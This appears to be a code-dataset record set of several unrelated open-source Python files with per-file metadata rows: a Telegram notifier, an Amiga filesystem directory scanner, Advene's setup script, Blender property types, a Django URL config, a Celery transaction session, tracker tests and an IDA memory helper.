return r.json().get('ok', False)
def send_message(self, msg):
url = '%s%s/sendMessage' % (self.url, self.token)
try:
response = requests.post(url, data={'chat_id': self.chat_id, 'text': msg})
except RequestException as e:
LOGGER.error('Failed to send Telegram message: %s', e)
else:
if response.ok:
json_data = response.json()
if json_data['ok']:
LOGGER.debug('Telegram message was sent to user %s', self.chat_id)
else:
LOGGER.error('Telegram notification was not sent: %s', json_data['description'])
else:
LOGGER.error('Telegram notification was not sent. Response code: %s (%s)',
response.status_code, response.reason)
NotifierClassesRegistry.add(TelegramNotifier)
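# --- Usage sketch (not part of the original module) ---
# The token and chat id below are placeholders; see the Telegram Bot API
# documentation referenced in the class docstring for how to obtain real ones.
def _usage_example():
    notifier = TelegramNotifier(token='123456:ABC-DEF', chat_id='987654321')
    if notifier.test_configuration():
        notifier.send_message('torrt: tracked torrents were updated')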
|
bsd-3-clause
| -1,036,498,508,307,981,600
| 34
| 105
| 0.593407
| false
| 3.947939
| false
| false
| false
|
alpine9000/amiga_examples
|
tools/external/amitools/amitools/fs/validate/DirScan.py
|
1
|
6864
|
from BlockScan import BlockScan
from amitools.fs.FSString import FSString
from amitools.fs.FileName import FileName
from amitools.fs.validate.Log import Log
import amitools.fs.DosType as DosType
class DirChainEntry:
"""entry of the hash chain"""
def __init__(self, blk_info):
self.blk_info = blk_info
self.parent_ok = False
self.fn_hash_ok = False
self.valid = False
self.end = False
self.orphaned = False
self.sub = None
def __str__(self):
l = []
if self.parent_ok:
l.append("parent_ok")
if self.fn_hash_ok:
l.append("fn_hash_ok")
if self.valid:
l.append("valid")
if self.end:
l.append("end")
if self.orphaned:
l.append("orphaned")
return "[DCE @%d '%s': %s]" % \
(self.blk_info.blk_num, self.blk_info.name, " ".join(l))
class DirChain:
"""representing a chain of the hashtable in a directory"""
def __init__(self, hash_val):
self.hash_val = hash_val
self.chain = []
def add(self, dce):
self.chain.append(dce)
def get_entries(self):
return self.chain
def __str__(self):
return "{DirChain +%d: #%d}" % (self.hash_val, len(self.chain))
class DirInfo:
"""information structure on a directory"""
def __init__(self, blk_info):
self.blk_info = blk_info
self.chains = {}
self.children = []
def add(self, dc):
self.chains[dc.hash_val] = dc
def add_child(self, c):
self.children.append(c)
def get(self, hash_val):
if hash_val in self.chains:
return self.chains[hash_val]
else:
return None
def get_chains(self):
return self.chains
def __str__(self):
bi = self.blk_info
blk_num = bi.blk_num
name = bi.name
parent_blk = bi.parent_blk
return "<DirInfo @%d '%s' #%d parent:%d child:#%d>" % (blk_num, name, len(self.chains), parent_blk, len(self.children))
class DirScan:
"""directory tree scanner"""
def __init__(self, block_scan, log):
self.log = log
self.block_scan = block_scan
self.root_di = None
self.intl = DosType.is_intl(block_scan.dos_type)
self.files = []
self.dirs = []
def scan_tree(self, root_blk_num, progress=None):
"""scan the root tree"""
# get root block info
root_bi = self.block_scan.get_block(root_blk_num)
if root_bi == None:
self.log.msg(Log.ERROR,"Root block not found?!",root_blk_num)
return None
# do tree scan
if progress != None:
progress.begin("dir")
self.root_di = self.scan_dir(root_bi, progress)
if progress != None:
progress.end()
return self.root_di
def scan_dir(self, dir_bi, progress):
"""check a directory by scanning through the hash table entries and follow the chains
Returns (all_chains_ok, dir_obj)
"""
# create new dir info
di = DirInfo(dir_bi)
self.dirs.append(di)
# run through hash_table of directory and build chains
chains = {}
hash_val = 0
for blk_num in dir_bi.hash_table:
if blk_num != 0:
# build chain
chain = DirChain(hash_val)
self.build_chain(chain, dir_bi, blk_num, progress)
di.add(chain)
hash_val += 1
return di
def build_chain(self, chain, dir_blk_info, blk_num, progress):
"""build a block chain"""
dir_blk_num = dir_blk_info.blk_num
dir_name = dir_blk_info.name
hash_val = chain.hash_val
# check whether the entry block was already seen/used before reading it
block_used = self.block_scan.is_block_available(blk_num)
# get entry block
blk_info = self.block_scan.read_block(blk_num)
# create dir chain entry
dce = DirChainEntry(blk_info)
chain.add(dce)
# account
if progress != None:
progress.add()
# block already used?
if block_used:
self.log.msg(Log.ERROR, "dir block already used in chain #%d of dir '%s (%d)" % (hash_val, dir_name, dir_blk_num), blk_num)
dce.end = True
return
# self reference?
if blk_num == dir_blk_num:
self.log.msg(Log.ERROR, "dir block in its own chain #%d of dir '%s' (%d)" % (hash_val, dir_name, dir_blk_num), blk_num)
dce.end = True
return
# not a block in range
if blk_info == None:
self.log.msg(Log.ERROR, "out-of-range block terminates chain #%d of dir '%s' (%d)" % (hash_val, dir_name, dir_blk_num), blk_num)
dce.end = True
return
# check type of entry block
b_type = blk_info.blk_type
if b_type not in (BlockScan.BT_DIR, BlockScan.BT_FILE_HDR):
self.log.msg(Log.ERROR, "invalid block terminates chain #%d of dir '%s' (%d)" % (hash_val, dir_name, dir_blk_num), blk_num)
dce.end = True
return
# check referenced block type in chain
blk_type = blk_info.blk_type
if blk_type in (BlockScan.BT_ROOT, BlockScan.BT_FILE_LIST, BlockScan.BT_FILE_DATA):
self.log.msg(Log.ERROR, "invalid block type %d terminates chain #%d of dir '%s' (%d)" % (blk_type, hash_val, dir_name, dir_blk_num), blk_num)
dce.end = True
return
# all following are ok
dce.valid = True
# check parent of block
name = blk_info.name
dce.parent_ok = (blk_info.parent_blk == dir_blk_num)
if not dce.parent_ok:
self.log.msg(Log.ERROR, "invalid parent in '%s' chain #%d of dir '%s' (%d)" % (name, hash_val, dir_name, dir_blk_num), blk_num)
# check name hash
fn = FileName(name, self.intl)
fn_hash = fn.hash()
dce.fn_hash_ok = (fn_hash == hash_val)
if not dce.fn_hash_ok:
self.log.msg(Log.ERROR, "invalid name hash in '%s' chain #%d of dir '%s' (%d)" % (name, hash_val, dir_name, dir_blk_num), blk_num)
# recurse into dir?
if blk_type == BlockScan.BT_DIR:
dce.sub = self.scan_dir(blk_info, progress)
elif blk_type == BlockScan.BT_FILE_HDR:
self.files.append(dce)
# check next block in chain
next_blk = blk_info.next_blk
if next_blk != 0:
self.build_chain(chain, dir_blk_info, next_blk, progress)
else:
dce.end = True
def get_all_file_hdr_blk_infos(self):
"""return all file chain entries"""
result = []
for f in self.files:
result.append(f.blk_info)
return result
def get_all_dir_infos(self):
"""return all dir infos"""
return self.dirs
def dump(self):
"""dump whole dir info structure"""
self.dump_dir_info(self.root_di, 0)
def dump_dir_info(self, di, indent):
"""dump a single dir info structure and its sub dirs"""
istr = " " * indent
print istr, di
for hash_value in sorted(di.get_chains().keys()):
dc = di.get(hash_value)
print istr," ",dc
for dce in dc.get_entries():
print istr," ",dce
sub = dce.sub
if sub != None and dce.blk_info.blk_type == BlockScan.BT_DIR:
self.dump_dir_info(sub, indent+1)
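# --- Usage sketch (not part of the original module) ---
# DirScan is driven by a BlockScan that has already classified the volume's
# blocks; the constructor calls below are illustrative assumptions about that
# setup, and 880 is the root block of a standard DD Amiga floppy.
#
#   log = Log()                                      # assumed constructor
#   block_scan = BlockScan(blkdev, log, dos_type)    # assumed constructor
#   dir_scan = DirScan(block_scan, log)
#   root_di = dir_scan.scan_tree(880)
#   if root_di is not None:
#       dir_scan.dump()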
|
bsd-2-clause
| -732,434,269,223,529,100
| 28.333333
| 147
| 0.60169
| false
| 3.150069
| false
| false
| false
|
oaubert/advene
|
setup.py
|
1
|
6968
|
#! /usr/bin/env python3
import logging
logger = logging.getLogger(__name__)
import os
from setuptools import setup, find_packages
import sys
# We define the main script name here (file in bin), since we have to change it for MacOS X
SCRIPTNAME='advene'
def check_changelog(maindir, version):
"""Check that the changelog for maindir matches the given version."""
with open(os.path.join( maindir, "CHANGES.txt" ), 'r') as f:
l=f.readline()
if not l.startswith('advene (' + version + ')'):
logger.error("The CHANGES.txt does not seem to match version %s\n%s\nUpdate either the CHANGES.txt or the lib/advene/core/version.py file", version, l)
sys.exit(1)
return True
def get_plugin_list(*package):
"""Return a plugin list from the given package.
package is in fact a list of path/module path elements.
No recursion is done.
"""
package= [ 'advene' ] + list(package)
path=os.path.sep.join(package)
prefix='.'.join(package)
plugins=[]
d=os.path.join('lib', path)
if not os.path.exists(d):
raise Exception("%s does not match a directory (%s does not exist)" % (prefix, d))
for n in os.listdir(d):
name, ext = os.path.splitext(n)
if ext != '.py':
continue
# Poor man's grep.
if [ l for l in open(os.path.join(d, n)).readlines() if 'def register' in l ]:
# It may be a plugin. Include it.
plugins.append('.'.join((prefix, name)))
return plugins
def get_version():
"""Get the version number of the package."""
maindir = os.path.dirname(os.path.abspath(sys.argv[0]))
if os.path.exists(os.path.join(maindir, "setup.py")):
# Chances are that we were in a development tree...
libpath=os.path.join(maindir, "lib")
sys.path.insert (0, libpath)
import advene.core.version
version=advene.core.version.version
else:
raise Exception("Unable to determine advene version number.")
check_changelog(maindir, version)
return version
_version=get_version()
platform_options={}
def get_packages_list():
"""Recursively find packages in lib.
Return a list of packages (dot notation) suitable as packages parameter
for distutils.
"""
if 'linux' in sys.platform:
return find_packages('lib', exclude=["cherrypy.*"])
else:
return find_packages('lib')
def generate_data_dir(dir_, prefix="", postfix=""):
"""Return a structure suitable for datafiles from a directory.
It will return a sequence of (directory, files) corresponding to the
data in the given directory.
prefix and postfix are dumbly added to dirname, so do not forget
the trailing / for prefix, and leading / for postfix if necessary.
"""
l = []
installdir=prefix+dir_+postfix
for dirname, dnames, fnames in os.walk(dir_):
if fnames:
if dirname.startswith(dir_):
installdirname=dirname.replace(dir_, installdir, 1)
l.append((installdirname, [ absf
for absf in [ os.path.sep.join((dirname,f))
for f in fnames ]
if not os.path.isdir(absf) ]))
return l
def generate_data_files():
# On Win32, we will install data files in
# \Program Files\Advene\share\...
# On MacOS X, it will be in Advene.app/Contents/Resources
# On Unix, it will be
# /usr/share/advene/...
if sys.platform == 'win32' or sys.platform == 'darwin':
prefix=''
postfix=''
else:
prefix="share"+os.path.sep
postfix=os.path.sep+"advene"
r=generate_data_dir("share", postfix=postfix)
r.extend(generate_data_dir("doc", prefix=prefix, postfix=postfix))
if not os.path.isdir("locale"):
logger.warning("""**WARNING** Generating the locales with "cd po; make mo".""")
os.system("pwd; cd po; make mo")
if os.path.isdir("locale"):
r.extend(generate_data_dir("locale", prefix=prefix))
else:
logger.warning("""**WARNING** Cannot find locale directory.""")
if sys.platform.startswith('linux'):
# Install specific data files
r.append( ( 'share/applications', [ 'share/advene.desktop' ] ) )
return r
myname = "Olivier Aubert"
myemail = "contact@olivieraubert.net"
setup (name = "advene",
version = _version,
description = "Annotate DVds, Exchange on the NEt",
keywords = "dvd,video,annotation",
author = "Advene project team",
author_email = myemail,
maintainer = myname,
maintainer_email = myemail,
url = "https://www.advene.org/",
license = "GPL",
long_description = """Annotate DVds, Exchange on the NEt
The Advene (Annotate DVd, Exchange on the NEt) project is aimed
towards communities exchanging discourses (analysis, studies) about
audiovisual documents (e.g. movies) in DVD format. This requires that
audiovisual content and hypertext facilities be integrated, thanks to
annotations providing explicit structures on audiovisual streams, upon
which hypervideo documents can be engineered.
.
The cross-platform Advene application allows users to easily
create comments and analyses of video comments, through the
definition of time-aligned annotations and their mobilisation
into automatically-generated or user-written comment views (HTML
documents). Annotations can also be used to modify the rendition
of the audiovisual document, thus providing virtual montage,
captioning, navigation... capabilities. Users can exchange their
comments/analyses in the form of Advene packages, independently from
the video itself.
.
The Advene framework provides models and tools allowing to design and reuse
annotations schemas; annotate video streams according to these schemas;
generate and create Stream-Time Based (mainly video-centred) or User-Time
Based (mainly text-centred) visualisations of the annotations. Schemas
(annotation- and relation-types), annotations and relations, queries and
views can be clustered and shared in units called packages. Hypervideo
documents are generated when needed, both from packages (for annotation and
view description) and DVDs (audiovisual streams).
""",
package_dir = {'': 'lib'},
packages = get_packages_list(),
scripts = [ 'bin/%s' % SCRIPTNAME, 'bin/advene_import', 'bin/advene_export' ],
data_files = generate_data_files(),
classifiers = [
'Environment :: X11 Applications :: GTK',
'Environment :: Win32 (MS Windows)',
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Programming Language :: Python',
'Intended Audience :: End Users/Desktop',
'Operating System :: OS Independent',
'Topic :: Multimedia :: Video :: Non-Linear Editor'
],
**platform_options
)
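# --- Usage sketch (not part of the original file) ---
# Typical developer invocations of this setup script (illustrative only);
# get_version() aborts if CHANGES.txt does not match lib/advene/core/version.py:
#
#   python3 setup.py sdist
#   python3 setup.py install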
|
gpl-2.0
| 829,313,294,184,711,600
| 37.076503
| 159
| 0.65729
| false
| 3.862528
| false
| false
| false
|
willcassella/SinGE
|
Tools/SinGED/types.py
|
1
|
12310
|
# types.py
import bpy
from bpy.types import PropertyGroup
from bpy.props import BoolProperty, IntProperty, FloatProperty, StringProperty, PointerProperty, EnumProperty, FloatVectorProperty
from functools import partial
def get_unused_component_types(scene=None, context=None):
# Unused arguments
del scene, context
node_id = bpy.context.active_object.sge_node_id
sge_scene = SinGEDProps.sge_scene
node = sge_scene.get_node(node_id)
used_component = sge_scene.get_node_components(node)
result = []
for component_type in SinGEDProps.sge_typedb.component_types:
if component_type not in (c.type.type_name for c in used_component):
result.append((component_type, component_type, ''))
return result
def construct_property_display_name(prop_name):
return prop_name.replace("_", " ")
def construct_property_path(property_path_str, prop_name):
if len(property_path_str) == 0:
return [prop_name]
return property_path_str.split('.') + [prop_name]
def property_getter(component_type_name, property_path, default):
try:
# Get the active node and component instance
sge_scene = SinGEDProps.sge_scene
node_id = bpy.context.active_object.sge_node_id
node = sge_scene.get_node(node_id)
component_type = sge_scene.get_component_type(component_type_name)
component_instance = component_type.get_instance(node)
# Get the property value
return component_instance.get_sub_property_immediate(property_path, default)
except Exception:
path = [component_type_name]
path.extend(property_path)
print("ERROR RETREIVING PROPERTY: {}".format(path))
return default
def property_setter(component_type_name, property_path, value):
# Get the active node and component instance
sge_scene = SinGEDProps.sge_scene
node_id = bpy.context.active_object.sge_node_id
node = sge_scene.get_node(node_id)
component_type = sge_scene.get_component_type(component_type_name)
component_instance = component_type.get_instance(node)
# Set the property value
component_instance.set_sub_property_immediate(property_path, value)
class SGETypes(PropertyGroup):
sge_component_types = EnumProperty(items=get_unused_component_types)
class SinGEDProps(PropertyGroup):
sge_host = StringProperty(name='Host', default='localhost')
sge_port = IntProperty(name='Port', default=1995)
sge_types = PointerProperty(type=SGETypes)
sge_realtime_update_delay = FloatProperty(default=0.033, precision=3, unit='TIME')
sge_scene_path = StringProperty(name='Path', default='')
sge_lightmap_light_dir = FloatVectorProperty(name="Light direction", subtype='XYZ', size=3, default=[0.0, -0.5, -0.5])
sge_lightmap_light_color = FloatVectorProperty(name="Light color", subtype='COLOR', size=3, default=[0.5, 0.5, 0.5])
sge_lightmap_light_intensity = FloatProperty(name="Light intensity", default=8.0)
sge_lightmap_ambient_color = FloatVectorProperty(name="Ambient light color", subtype='COLOR', size=3, default=[0.5, 0.5, 0.5])
sge_lightmap_ambient_intensity = FloatProperty(name="Ambient light intensity", default=0.0)
sge_lightmap_num_indirect_sample_sets = IntProperty(name="Indirect sample sets", subtype='UNSIGNED', default=16)
sge_lightmap_num_accumulation_steps = IntProperty(name="Accumulation steps", subtype='UNSIGNED', default=1)
sge_lightmap_num_post_steps = IntProperty(name="Post processing steps", subtype='UNSIGNED', default=2)
sge_lightmap_path = StringProperty(name="Lightmap path")
sge_session = None
sge_typedb = None
sge_scene = None
sge_resource_manager = None
class SGETypeBase(PropertyGroup):
@classmethod
def sge_unregister(cls):
bpy.utils.unregister_class(cls)
@classmethod
def sge_create_property(cls, name):
return PointerProperty(name=name, type=cls)
@classmethod
def sge_draw(cls, layout, parent_obj, parent_attr_name):
# Draw each property recursively
self = getattr(parent_obj, parent_attr_name)
for attr_name, prop_name, prop_type in cls.sge_property_list:
# If the property is a primitive type, don't give it a label
if not issubclass(prop_type, SGEPrimitiveBase):
layout.label(construct_property_display_name(prop_name))
prop_type.sge_draw(layout.column(), self, attr_name)
class SGEPrimitiveBase(object):
@staticmethod
def sge_unregister():
return
@staticmethod
def sge_draw(layout, parent_obj, parent_attr_name):
# Draw the property
layout.prop(parent_obj, parent_attr_name)
class SGEBool(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return BoolProperty(
name=construct_property_display_name(name),
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), False),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEInt(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return IntProperty(
name=construct_property_display_name(name),
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), 0),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEUInt(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return IntProperty(
name=construct_property_display_name(name),
subtype='UNSIGNED',
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), 0),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEFloat(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return FloatProperty(
name=construct_property_display_name(name),
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), 0.0),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEString(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return StringProperty(
name=construct_property_display_name(name),
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), ""),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEAngle(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return FloatProperty(
name=construct_property_display_name(name),
subtype='ANGLE',
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), 0),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEColorRGBA8(SGEPrimitiveBase):
@staticmethod
def sge_get(outer, prop_name):
value = property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), "ffffffff")
red = int(value[: 2], 16)
green = int(value[2: 4], 16)
blue = int(value[4: 6], 16)
alpha = int(value[6: 8], 16)
return [float(red)/255, float(green)/255, float(blue)/255, float(alpha)/255]
@staticmethod
def sge_set(outer, prop_name, value):
red = int(value[0] * 255)
green = int(value[1] * 255)
blue = int(value[2] * 255)
alpha = int(value[3] * 255)
property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), "%0.2x%0.2x%0.2x%0.2x" % (red, green, blue, alpha))
@staticmethod
def sge_create_property(name):
return FloatVectorProperty(
name=name,
subtype='COLOR',
size=4,
min=0.0,
max=1.0,
get=lambda outer: SGEColorRGBA8.sge_get(outer, name),
set=lambda outer, value: SGEColorRGBA8.sge_set(outer, name, value))
class SGEColorRGBF32(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return FloatVectorProperty(
name=construct_property_display_name(name),
subtype='COLOR',
size=3,
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), [0.0, 0.0, 0.0]),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEVec2(SGEPrimitiveBase):
@staticmethod
def sge_get(outer, prop_name):
value = property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), None)
if value is None:
return [0.0, 0.0]
else:
return [value['x'], value['y']]
@staticmethod
def sge_set(outer, prop_name, value):
property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), {'x': value[0], 'y': value[1]})
@staticmethod
def sge_create_property(name):
return FloatVectorProperty(
name=construct_property_display_name(name),
subtype='XYZ',
size=2,
get=lambda outer: SGEVec2.sge_get(outer, name),
set=lambda outer, value: SGEVec2.sge_set(outer, name, value))
class SGEVec3(SGEPrimitiveBase):
@staticmethod
def sge_get(outer, prop_name):
value = property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), None)
if value is None:
return [0.0, 0.0, 0.0]
else:
return [value['x'], value['y'], value['z']]
@staticmethod
def sge_set(outer, prop_name, value):
property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), {'x': value[0], 'y': value[1], 'z': value[2]})
@staticmethod
def sge_create_property(name):
return FloatVectorProperty(
name=construct_property_display_name(name),
subtype='XYZ',
size=3,
get=lambda outer: SGEVec3.sge_get(outer, name),
set=lambda outer, value: SGEVec3.sge_set(outer, name, value))
def create_blender_type(typedb, type_name, type_info):
# Create dictionaries for the class and the properties
property_list = list()
class_dict = {
'sge_type_name': type_name,
'sge_property_list': property_list,
'sge_component_type_name': StringProperty(),
'sge_property_path': StringProperty(),
}
# Define each property
if 'properties' in type_info:
properties = list(type_info['properties'].items())
properties.sort(key=lambda prop: prop[1]['index'])
for prop_name, prop_info in properties:
# Get the property's type
prop_type = typedb.get_type(prop_info['type'])
# Create an attribute name for the property
attr_name = "sge_prop_{}".format(prop_name)
# Create the class dictionary entry
class_dict[attr_name] = prop_type.sge_create_property(prop_name)
# Create the property list entry
property_list.append((attr_name, prop_name, prop_type))
# Generate a sanitary name for the type
class_name = type_name.replace("::", "_")
# Create the type
blender_type = type(class_name, (SGETypeBase,), class_dict)
# Register it with Blender
bpy.utils.register_class(blender_type)
return blender_type
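# --- Usage sketch (not part of the original module) ---
# create_blender_type() turns a SinGE type description into a registered
# Blender PropertyGroup. The type_info layout below mirrors what the function
# reads ('properties' -> name -> {'type', 'index'}); the typedb object and the
# type names are illustrative assumptions.
#
#   type_info = {
#       'properties': {
#           'enabled': {'type': 'bool', 'index': 0},
#           'intensity': {'type': 'float', 'index': 1},
#       },
#   }
#   blender_type = create_blender_type(SinGEDProps.sge_typedb, 'sge::CSpotlight', type_info)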
|
mit
| -3,868,031,757,075,581,000
| 39.89701
| 167
| 0.670106
| false
| 3.507123
| false
| false
| false
|
Seattle-Meal-Maps/seattle-meal-maps-api
|
meal_api/meal_api/urls.py
|
1
|
1205
|
"""meal_api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from rest_framework import routers
from api.views import DataViewSet, HoursViewSet
router = routers.DefaultRouter()
router.register(r'services', DataViewSet)
router.register(r'hours', HoursViewSet)
hours_list = HoursViewSet.as_view({
'get': 'list'
})
data_list = DataViewSet.as_view({
'get': 'list'
})
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
|
mit
| -6,016,341,527,609,289,000
| 32.472222
| 82
| 0.703734
| false
| 3.37535
| false
| false
| false
|
ZeitOnline/z3c.celery
|
src/z3c/celery/session.py
|
1
|
1860
|
import threading
import transaction
import zope.interface
import transaction.interfaces
class CelerySession(threading.local):
"""Thread local session of data to be sent to Celery."""
def __init__(self):
self.tasks = []
self._needs_to_join = True
def add_call(self, method, *args, **kw):
self._join_transaction()
self.tasks.append((method, args, kw))
def reset(self):
self.tasks = []
self._needs_to_join = True
def _join_transaction(self):
if not self._needs_to_join:
return
dm = CeleryDataManager(self)
transaction.get().join(dm)
self._needs_to_join = False
def _flush(self):
for method, args, kw in self.tasks:
method(*args, **kw)
self.reset()
def __len__(self):
"""Number of tasks in the session."""
return len(self.tasks)
celery_session = CelerySession()
@zope.interface.implementer(transaction.interfaces.IDataManager)
class CeleryDataManager(object):
"""DataManager embedding the access to celery into the transaction."""
transaction_manager = None
def __init__(self, session):
self.session = session
def abort(self, transaction):
self.session.reset()
def tpc_begin(self, transaction):
pass
def commit(self, transaction):
pass
tpc_abort = abort
def tpc_vote(self, transaction):
self.session._flush()
def tpc_finish(self, transaction):
pass
def sortKey(self):
# Sort last, so that sending to celery is done after all other
# DataManagers signalled an okay.
return "~z3c.celery"
def __repr__(self):
"""Custom repr."""
return '<{0.__module__}.{0.__name__} for {1}, {2}>'.format(
self.__class__, transaction.get(), self.session)
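# --- Usage sketch (not part of the original module) ---
# Tasks queued on celery_session are flushed to Celery only when the
# surrounding Zope transaction votes to commit; on abort they are dropped.
# The task object and its apply_async arguments below are illustrative
# assumptions.
def _usage_example(task):
    celery_session.add_call(task.apply_async, ('payload',), countdown=5)
    transaction.commit()  # tpc_vote flushes the queued call to Celery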
|
bsd-3-clause
| -8,065,323,295,136,975,000
| 23.473684
| 74
| 0.601075
| false
| 3.982869
| false
| false
| false
|
bnoi/scikit-tracker
|
sktracker/tracker/cost_function/tests/test_abstract_cost_functions.py
|
1
|
1500
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from nose.tools import assert_raises
import sys
import pandas as pd
import numpy as np
from sktracker.tracker.cost_function import AbstractCostFunction
def test_abstract_cost_function():
cost_func = AbstractCostFunction(context={}, parameters={})
assert cost_func.get_block() == None
def test_abstract_cost_function_check_context():
cost_func = AbstractCostFunction(context={'cost': 1}, parameters={})
assert_raises(ValueError, cost_func.check_context, 'test_string', str)
cost_func.context['test_string'] = 5
assert_raises(TypeError, cost_func.check_context, 'test_string', str)
cost_func.context['test_string'] = "i am a string"
### This fails in py2.7
if sys.version_info[0] > 2:
cost_func.check_context('test_string', str)
assert True
def test_abstract_cost_function_check_columns():
cost_func = AbstractCostFunction(context={}, parameters={})
df = pd.DataFrame([np.arange(0, 5), np.arange(20, 25)],
columns=['x', 'y', 'z', 'w', 't'])
cost_func.check_columns(df, ['t', 'z', 'y'])
cost_func.check_columns([df], ['t', 'z', 'y'])
df = pd.DataFrame([np.arange(0, 4), np.arange(20, 24)],
columns=['x', 'y', 'w', 't'])
assert_raises(ValueError, cost_func.check_columns, df, ['t', 'z', 'y'])
|
bsd-3-clause
| 8,376,291,811,204,249,000
| 26.777778
| 75
| 0.64
| false
| 3.440367
| true
| false
| false
|
chubbymaggie/idalink
|
idalink/memory.py
|
1
|
10682
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2013- Yan Shoshitaishvili aka. zardus
# Ruoyu Wang aka. fish
# Andrew Dutcher aka. rhelmot
# Kevin Borgolte aka. cao
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
__all__ = ["get_memory", "IDAMemory", "CachedIDAMemory",
"IDAPermissions", "CachedIDAPermissions"]
import collections
import itertools
import logging
import operator
LOG = logging.getLogger("idalink.ida_mem")
# Helper functions.
def _dict_values_sorted_by_key(dictionary):
# This should be a yield from instead.
"""Internal helper to return the values of a dictionary, sorted by key.
"""
for _, value in sorted(dictionary.iteritems(), key=operator.itemgetter(0)):
yield value
def _ondemand(f):
"""Decorator to only request information if not in cache already.
"""
name = f.__name__
def func(self, *args, **kwargs):
if not args and not kwargs:
if hasattr(self, "_" + name):
return getattr(self, "_" + name)
a = f(self, *args, **kwargs)
setattr(self, "_" + name, a)
return a
else:
return f(self, *args, **kwargs)
func.__name__ = name
return func
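# Example (hypothetical sketch, not part of idalink): _ondemand caches the
# result of a no-argument call on the instance under an attribute named
# "_<method name>", so repeated calls do the work only once.
class _OndemandDemo(object):
    def __init__(self):
        self.calls = 0

    @_ondemand
    def answer(self):
        self.calls += 1
        return 42

# demo = _OndemandDemo(); demo.answer(); demo.answer()
# -> demo.calls == 1, because the second call returns the cached "_answer".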
# Functions others are allowed to call.
def get_memory(idaapi, start, size, default_byte=None):
# TODO: Documentation
if idaapi is None:
idaapi = __import__("idaapi")
if size == 0:
return {}
# We are optimistic and assume it's a continuous memory area
at_address = idaapi.get_many_bytes(start, size)
d = {}
if at_address is None:  # It was not contiguous, so fall back to a binary-search style split
if size == 1:
if default_byte is not None:
LOG.debug("Using default byte for %d", start)
d[start] = default_byte
return d
mid = start + size / 2
first_size = mid - start
second_size = size - first_size
left = get_memory(idaapi, start, first_size, default_byte=default_byte)
right = get_memory(idaapi, mid, second_size, default_byte=default_byte)
if default_byte is None:
# will be nonsequential
d.update(left)
d.update(right)
else:
# it will be sequential, so let's combine it
chained = itertools.chain(_dict_values_sorted_by_key(left),
_dict_values_sorted_by_key(right))
d[start] = "".join(chained)
else:
d[start] = at_address
return d
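# Example (hypothetical sketch, not part of idalink): get_memory() only needs
# an object exposing get_many_bytes(), so it can be exercised without IDA.
class _FakeIdaapi(object):
    _data = b"\x90" * 8  # pretend the database holds eight NOP bytes

    def get_many_bytes(self, start, size):
        chunk = self._data[start:start + size]
        return chunk if len(chunk) == size else None

# get_memory(_FakeIdaapi(), 0, 8) returns {0: b"\x90" * 8} under these
# assumptions, because the whole requested range is contiguous.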
class IDAKeys(collections.MutableMapping): # pylint: disable=W0223
# TODO: delitem, setitem, getitem are abstract, should be fixed,
# disabled warning should be removed
def __init__(self, ida):
self.ida = ida
# Gets the "heads" (instructions and data items) and head sizes from IDA
@_ondemand
def heads(self, exclude=()):
# TODO: Documentation
LOG.debug("Getting heads from IDA for file %s", self.ida.filename)
